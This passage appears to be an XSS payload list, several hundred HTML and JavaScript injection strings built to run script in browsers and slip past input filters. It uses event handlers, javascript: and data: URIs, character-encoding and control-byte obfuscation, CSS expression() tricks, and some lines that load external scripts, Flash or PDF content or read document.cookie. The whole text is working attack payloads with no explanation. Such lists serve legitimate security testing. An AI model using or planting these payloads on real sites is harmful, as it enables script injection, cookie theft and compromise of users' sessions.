</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> | |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |
<video src=1 href=1 onerror="javascript:alert(1)"></video> | |
<body src=1 href=1 onerror="javascript:alert(1)"></body> | |
<image src=1 href=1 onerror="javascript:alert(1)"></image> | |
<object src=1 href=1 onerror="javascript:alert(1)"></object> | |
<script src=1 href=1 onerror="javascript:alert(1)"></script> | |
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |
<object onError object onError="javascript:javascript:alert(1)"></object onError> | |
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |
<body onload body onload="javascript:javascript:alert(1)"></body onload> | |
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |
\x3Cscript>javascript:alert(1)</script> | |
'"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |
<script>javascript:alert(1)</script\x0D | |
<script>javascript:alert(1)</script\x0A | |
<script>javascript:alert(1)</script\x0B | |
<script charset="\x22>javascript:alert(1)</script> | |
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |
`"'><img src='#\x27 onerror=javascript:alert(1)> | |
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> | |
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> | |
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<script>/* *\x2A/javascript:alert(1)// */</script> | |
<script>/* *\x00/javascript:alert(1)// */</script> | |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> | |
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF | |
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF | |
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> | |
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> | |
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> | |
<script src="data:\xD4\x8F,javascript:alert(1)"></script> | |
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> | |
<script src="data:\xCB\x8F,javascript:alert(1)"></script> | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x00(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x09expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x20expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x00expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | |
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> | |
"`'><script>\x3Bjavascript:alert(1)</script> | |
"`'><script>\x0Djavascript:alert(1)</script> | |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> | |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> | |
"`'><script>\x09javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> | |
"`'><script>\x00javascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> | |
"`'><script>\x0Cjavascript:alert(1)</script> | |
"`'><script>\x2Bjavascript:alert(1)</script> | |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | |
"`'><script>-javascript:alert(1)</script> | |
"`'><script>\x0Ajavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | |
"`'><script>\x7Ejavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> | |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> | |
"`'><script>\xC2\x85javascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> | |
"`'><script>\x21javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> | |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | |
"`'><script>\x0Bjavascript:alert(1)</script> | |
"`'><script>\x20javascript:alert(1)</script> | |
"`'><script>\xC2\xA0javascript:alert(1)</script> | |
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> | |
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> | |
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> | |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> | |
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> | |
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> | |
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> | |
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> | |
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> | |
<script\x2F>javascript:alert(1)</script> | |
<script\x20>javascript:alert(1)</script> | |
<script\x0D>javascript:alert(1)</script> | |
<script\x0A>javascript:alert(1)</script> | |
<script\x0C>javascript:alert(1)</script> | |
<script\x00>javascript:alert(1)</script> | |
<script\x09>javascript:alert(1)</script> | |
"><img src=x onerror=javascript:alert(1)> | |
"><img src=x onerror=javascript:alert('1')> | |
"><img src=x onerror=javascript:alert("1")> | |
"><img src=x onerror=javascript:alert(`1`)> | |
"><img src=x onerror=javascript:alert(('1'))> | |
"><img src=x onerror=javascript:alert(("1"))> | |
"><img src=x onerror=javascript:alert((`1`))> | |
"><img src=x onerror=javascript:alert(A)> | |
"><img src=x onerror=javascript:alert((A))> | |
"><img src=x onerror=javascript:alert(('A'))> | |
"><img src=x onerror=javascript:alert('A')> | |
"><img src=x onerror=javascript:alert(("A"))> | |
"><img src=x onerror=javascript:alert("A")> | |
"><img src=x onerror=javascript:alert((`A`))> | |
"><img src=x onerror=javascript:alert(`A`)> | |
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x00=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x20=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x09=javascript:alert(1)> | |
<script>javascript:alert(1)<\x00/script> | |
<img src=# onerror\x3D"javascript:alert(1)" > | |
<input onfocus=javascript:alert(1) autofocus> | |
<input onblur=javascript:alert(1) autofocus><input autofocus> | |
<video poster=javascript:javascript:alert(1)// | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | |
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X | |
<video><source onerror="javascript:javascript:alert(1)"> | |
<video onerror="javascript:javascript:alert(1)"><source> | |
<form><button formaction="javascript:javascript:alert(1)">X | |
<body oninput=javascript:alert(1)><input autofocus> | |
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
<frameset onload=javascript:alert(1)> | |
<table background="javascript:javascript:alert(1)"> | |
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> | |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> | |
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> | |
<object data="data:text/html;base64,%(base64)s"> | |
<embed src="data:text/html;base64,%(base64)s"> | |
<b <script>alert(1)</script>0 | |
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> | |
<embed src="javascript:alert(1)"> | |
<img src="javascript:alert(1)"> | |
<image src="javascript:alert(1)"> | |
<script src="javascript:alert(1)"> | |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x | |
<? foo="><script>javascript:alert(1)</script>"> | |
<! foo="><script>javascript:alert(1)</script>"> | |
</ foo="><script>javascript:alert(1)</script>"> | |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> | |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> | |
<% foo><x foo="%><script>javascript:alert(1)</script>"> | |
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> | |
<img \x00src=x onerror="alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x11src=x onerror="javascript:alert(1)"> | |
<img \x12src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x10src=x onerror="javascript:alert(1)"> | |
<img\x13src=x onerror="javascript:alert(1)"> | |
<img\x32src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x11src=x onerror="javascript:alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x34src=x onerror="javascript:alert(1)"> | |
<img \x39src=x onerror="javascript:alert(1)"> | |
<img \x00src=x onerror="javascript:alert(1)"> | |
<img src\x09=x onerror="javascript:alert(1)"> | |
<img src\x10=x onerror="javascript:alert(1)"> | |
<img src\x13=x onerror="javascript:alert(1)"> | |
<img src\x32=x onerror="javascript:alert(1)"> | |
<img src\x12=x onerror="javascript:alert(1)"> | |
<img src\x11=x onerror="javascript:alert(1)"> | |
<img src\x00=x onerror="javascript:alert(1)"> | |
<img src\x47=x onerror="javascript:alert(1)"> | |
<img src=x\x09onerror="javascript:alert(1)"> | |
<img src=x\x10onerror="javascript:alert(1)"> | |
<img src=x\x11onerror="javascript:alert(1)"> | |
<img src=x\x12onerror="javascript:alert(1)"> | |
<img src=x\x13onerror="javascript:alert(1)"> | |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |
<img src=x onerror=\x09"javascript:alert(1)"> | |
<img src=x onerror=\x10"javascript:alert(1)"> | |
<img src=x onerror=\x11"javascript:alert(1)"> | |
<img src=x onerror=\x12"javascript:alert(1)"> | |
<img src=x onerror=\x32"javascript:alert(1)"> | |
<img src=x onerror=\x00"javascript:alert(1)"> | |
<a href=javascript:javascript:alert(1)>XXX</a> | |
<img src="x` `<script>javascript:alert(1)</script>"` `> | |
<img src onerror /" '"= alt=javascript:alert(1)//"> | |
<title onpropertychange=javascript:alert(1)></title><title title=> | |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |
<!--[if]><script>javascript:alert(1)</script --> | |
<!--[if<img src=x onerror=javascript:alert(1)//]> --> | |
<script src="/\%(jscript)s"></script> | |
<script src="\\%(jscript)s"></script> | |
